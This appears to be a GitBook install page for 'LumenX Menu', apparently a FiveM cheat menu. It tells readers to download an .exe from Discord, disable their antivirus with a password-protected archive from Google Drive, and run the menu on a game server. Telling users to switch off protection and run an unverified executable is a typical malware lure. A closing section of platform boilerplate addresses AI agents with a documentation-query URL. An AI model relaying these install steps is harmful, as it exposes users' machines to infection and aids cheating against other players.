> For the complete documentation index, see [llms.txt](https://lumenx.gitbook.io/lumenx/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://lumenx.gitbook.io/lumenx/readme.md).

# LumenX Menu

## DOWNLOA&#x44;**:**<br>

Welcome to LumenX, installing our menu is super easy!!!\
To get started, **download the .exe file from this link**: \
<https://discord.gg/A7v3Sw2z9f> in the channel in to server discord 𝗨𝗣𝗗𝗔𝗧𝗘𝗦-𝗠𝗘𝗡𝗨<br>

As soon as you have downloaded it, **disable the antivirus** so you don’t encounter unnecessary problems when opening it, remove it using this file \
[https://drive.usercontent.google.com/download?id=1jxmKjN820qP\_cLZLgbeBi-aP5DUbROle\&export=download\&authuser=0. ](https://drive.usercontent.google.com/download?id=1jxmKjN820qP_cLZLgbeBi-aP5DUbROle\&export=download\&authuser=0.)\
\
As soon as you have downloaded it, extract the file with the password: Sordum, and disable the antivirus. After that, returning to the menu, put the file in a folder, for example, call it main.\
Once this step is completed, **open FiveM**.

**As soon as the server you have chosen has opened**, run the menu and enter the key that was provided to you.

If you have encountered problems, use the support ticket menu on the Discord server: <https://discord.gg/A7v3Sw2z9f>

**/LumenX**


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter:

```
GET https://lumenx.gitbook.io/lumenx/readme.md?ask=<question>&goal=<endgoal>
```

`ask` is the immediate question: it should be specific, self-contained, and written in natural language.
`goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal.

The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.
